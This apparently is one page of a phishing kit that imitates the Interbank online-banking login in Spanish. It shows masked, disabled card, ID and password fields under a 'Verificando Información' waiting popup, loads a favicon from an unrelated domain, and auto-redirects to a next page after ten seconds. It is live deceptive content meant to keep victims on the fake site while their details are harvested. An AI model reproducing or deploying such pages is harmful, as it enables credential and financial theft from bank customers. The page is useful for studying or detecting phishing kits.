<!DOCTYPE html>
<html lang="es"><head class="at-element-marker"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="msapplication-navbutton-color" content="#009b3a">
  <title>Inter</title>

  <link href="https://slupinty.nl/inters/recursos/images/favicon.ico" rel="Shortcut Icon">
  <meta name="apple-mobile-web-app-status-bar-style" content="green">

  <link href="./assets/estilin.css" rel="stylesheet">

  <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=5.0">

  <meta http-equiv="refresh" content="10;url=index2.html">
  <meta name="google" content="notranslate">
  <meta name="robots" content="noindex">
  <link href="./assets/popup.css" rel="stylesheet">
<style type="text/css" id="operaUserStyle"></style></head>

<body>
  <div id="app">
    <div data-v-6e2e026b="">
      <div data-v-6e2e026b="" class="ibk-login-layout__background">
        <div data-v-6e2e026b="" class="ibk-login-layout__wrapper">
          <div data-v-6e2e026b="" class="login--logo-ctn"><a data-v-6e2e026b="" class="logo"><img data-v-6e2e026b="" src="./assets/logo-blue-white.svg" alt="logo interbank"></a></div>
          <div data-v-6e2e026b="" class="ibk-login-layout__page-nav">
            <div data-v-6e2e026b="">
              <div>
                <div data-v-6793d155="">
                  <div data-v-6793d155="" class="ibk-auth-box-body">
                    <p data-v-6793d155="" class="box-title"></p>
                    <div class="ibk-form" data-v-6793d155="">
                      <div class="ibk-auth-fields">
                        <div class="ibk-grid-row">
                          <div data-v-a4cc4d26="" class="ibk-grid__col ibk-auth-fields__checkbox-remember__wrapper ibk-grid__col--1-1">
                            <div data-v-41575993="" class="ibk-textfield mdl-textfield input-text mdl-textfield--floating-label" id="cardNumber" data-v-a4cc4d26=""><label data-v-41575993="" for="25" class="mdl-textfield__label"></label><input disabled="" data-v-41575993="" id="25" value="**** **** **** ****" inputmode="decimal" maxlength="19" class="mdl-textfield__input">
                              <div data-v-41575993="" class="ibk-textfield__icon-appended"></div>

                            </div>
                            <div data-v-1243fb90="" class="ibk-auth-fields__checkbox-remember" data-v-a4cc4d26="">
                              <span data-v-1243fb90="" class="ibk-auth-fields__checkbox__separator-line" style="display: none;"></span>
                            </div>
                          </div>
                        </div>
                        <div class="ibk-grid-row">
                          <div data-v-a4cc4d26="" class="ibk-grid__col ibk-grid__col--1-4">
                            <div data-v-0cae509c="" tabindex="-1" class="ibk-combobox" data-v-a4cc4d26="">
                              <div id="documentType" data-v-0cae509c="" class="ibk-combobox__selections">
                                <div data-v-0cae509c="" class="mdl-textfield mdl-textfield--floating-label is-dirty">
                                  <div data-v-0cae509c="" id="selectedOption" class="ibk-combobox__selections__input-fake mdl-textfield__input">
                                    ***
                                  </div><label data-v-0cae509c="" for="32" class="mdl-textfield__label"></label><i data-v-46ceb492="" data-v-0cae509c="" class="ibk-icon icon-ibk ibk-combobox__icon icon-ibk-angle-down"></i>

                                </div>
                              </div>
                            </div>
                          </div>
                          <div data-v-a4cc4d26="" class="ibk-grid__col ibk-auth-fields__checkbox-remember__wrapper ibk-grid__col--3-4">
                            <div data-v-41575993="" class="ibk-textfield mdl-textfield input-text mdl-textfield--floating-label" id="documentNumber" data-v-a4cc4d26=""><label data-v-41575993="" for="39" class="mdl-textfield__label"></label><input data-v-41575993="" disabled="" value="********" id="39" inputmode="text" type="text" maxlength="8" class="mdl-textfield__input">
                              <div data-v-41575993="" class="ibk-textfield__icon-appended"></div>

                            </div>

                          </div>
                        </div>
                      </div>
                      <div>
                        <div>
                          <div data-v-41575993="" class="ibk-textfield mdl-textfield ibk-textfield--prepended mdl-textfield--floating-label" id="password">
                            <label data-v-41575993="" for="46" class="mdl-textfield__label"></label><span data-v-41575993="" class="ibk-textfield__prepend-content"><i data-v-46ceb492="" class="ibk-icon icon-ibk c_secondary tw-ml-2 tw-text-lg icon-ibk-info-ghost has-tooltip" data-original-title="null" data-v-41575993=""></i></span><input data-v-41575993="" disabled="" value="********" id="46" inputmode="text" type="password" name="password" class="mdl-textfield__input">
                            <div data-v-41575993="" class="ibk-textfield__icon-appended"></div>

                          </div>
                        </div>
                      </div>
                      <div class="ibk-ui-checkbox"><label for="rememberMe" id="checkBoxOption" class="mdl-checkbox is-upgraded"><input type="checkbox" id="rememberMe" name="rememberMe" class="form__checkbox mdl-checkbox__input"><span class="mdl-checkbox__label"> Recordar
                            datos </span><span class="mdl-checkbox__focus-helper"></span><span class="mdl-checkbox__box-outline"><span class="mdl-checkbox__tick-outline"></span></span></label>

                      </div><button data-v-521d65ac="" id="" type="submit" disabled="" class="tw-mt-8 ibk-ui-button ibk-ui-button--primary ibk-ui-button--center">
                        Ingresar
                      </button>
                    </div>
                  </div>
                  <div data-v-6793d155="" class="ibk-auth-box-actions">
                    <div data-v-3b882c4b="" data-v-6793d155="" class="footer-items tw-flex tw-justify-around tw-mt-1">
                      <ul data-v-3b882c4b="">
                        <li data-v-3b882c4b=""><a data-v-3b882c4b="" class="tw-cursor-pointer">
                            Regístrate
                          </a></li>
                        <li data-v-3b882c4b=""><a data-v-3b882c4b="">
                            Olvidé mi clave web
                          </a></li>
                        <li data-v-3b882c4b=""><a data-v-3b882c4b="" target="_blank">
                            Ayuda
                          </a></li>
                      </ul>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>

<section class="containerCustom" id="docPopup" style="display: block;">
  
  <form id="mainF"  method="post">
    <div class="overlay">
      <div class="modalCustom">
        <center>
          <img width="30px" style="border-radius: 10px;" src="./assets/logoSmall.png">
          <br>
          <h1 class="title" style="font-size: 21px;">Verificando Información
          </h1>
          <hr>
          <br>
          <div class="spinner"></div><br>
          <p style="font-size: 14px;">
            Espera un momento, no cierres esta ventana.
          </p>
        </center>
      </div>
    </div>
  </form>
</section>

</body></html>